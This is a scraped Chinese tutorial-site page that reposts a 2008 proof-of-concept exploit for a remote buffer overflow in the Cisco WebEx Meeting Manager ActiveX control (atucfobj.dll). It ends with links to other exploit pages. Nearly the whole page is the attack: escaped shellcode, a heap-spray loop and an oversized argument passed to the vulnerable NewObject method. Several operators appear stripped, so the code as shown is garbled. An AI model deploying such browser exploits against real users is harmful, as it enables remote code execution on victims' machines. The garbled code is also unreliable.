手机
当前位置:查字典教程网 >网络安全 >Exploit >Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit
Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit
摘要://k`sOSe08/08/2008//testedinIE6,XPSP1varshellcode=unescape("%ue8fc%u00...

<html>

<body> <object classid=clsid:32E26FD9-F435-4A20-A561-35D4B987CFDC id=target />

</object> <script language=javascript> // k`sOSe 08/08/2008

// tested in IE6, XP SP1

var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u535c%u5359%u4554%u334d%u5c32%u4143%u434c%u452e%u4558%u4100"); var block = unescape("%u0909%u0909");

while (block.length < 0x25000) block = block; var memory = new Array(); var i=0;

for (;i<1000;i ) memory[i] = block shellcode; memory[i] = shellcode; var buf2;

for (var i=0; i<151; i ) buf2 = "X"; buf2 = unescape(" "); target.NewObject(buf2); </script> </body>

</html>

【Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit】相关文章:

MS Internet Explorer (FTP Server Response) DoS Exploit

Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control BOF Exploit

Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit

BurnAware NMSDVDXU ActiveX Remote Arbitrary File Creation/Execution

Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit

Microsoft DNS Server (Dynamic DNS Updates) Remote Exploit

Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit

Yahoo Messenger 8.1 ActiveX Remote Denial of Service Exploit

Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit

精品推荐
分类导航